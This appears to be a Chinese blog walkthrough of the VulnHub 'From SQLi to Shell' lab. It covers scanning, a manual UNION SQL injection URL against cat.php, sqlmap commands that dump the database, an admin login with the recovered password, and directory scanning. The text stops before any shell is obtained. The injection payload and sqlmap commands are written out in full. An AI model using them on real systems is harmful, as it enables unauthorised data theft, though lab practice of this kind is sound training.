Debian6靶机详解

靶机下载

https://download.vulnhub.com/pentesterlab/from_sqli_to_shell_i386.iso

主机发现

arp-scan -l

 

636bf13520fa209bd1a484d3e6098566.png

端口扫描

nmap -A -sV -p- 192.168.48.138 

 

3b427366383313f91dbbc6475a6cdc01.png

访问80端口

http://192.168.48.138:80

 

eda5cdce9587f560e3a80d6ddf31b72a.png

F12查看页面源码

 

d19ffb1b5e58d9de7df41e9ff85f3902.png

存在sql注入并发现了文件上传路径

访问文件上传路径

http://192.168.48.138/admin/uploads/

 

82f2b99c54ec7d0833a041009eeea6e6.png

访问admin

http://192.168.48.138/admin/login.php

 

32d9d36f6edafa4cb24ae29f688152c4.png

sql注入测试

http://192.168.48.138/cat.php?id=-2%20union%20select%201,group_concat(table_name)%20,3,4%20from%20information_schema.tables%20where%20table_schema=database()--+

 

3717f3971304357f33b92952301b533f.png

sqlmap

跑数据库

sqlmap -u "http://192.168.48.138/cat.php?id=1" --batch -dbs

 

b68c889dd99292738ea6e16e0daa706d.png

爆表和字段信息

sqlmap -u "http://192.168.48.138/cat.php?id=1" --batch -D photoblog -dump-all

 

967a152f1b6c8bdebb95e6e224a9d49c.png

获得密码登录成功

 

c000a6c0caa6ce061f964243a93c5d61.png

目录扫描

python3 dirsearch.py -u http://192.168.48.138

 

71ad785c75e11c096b8a62a4334b6870.png

访问http://192.168.48.138/admin/

http://192.168.48.138/admin/login.php

 

3ba6ae3e1f0daea6373ed4454e5d6a9d.png

访问css/

http://192.168.48.138/css/

 

38a0863ddfe775bfe018cded6133e21d.png

 

 

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值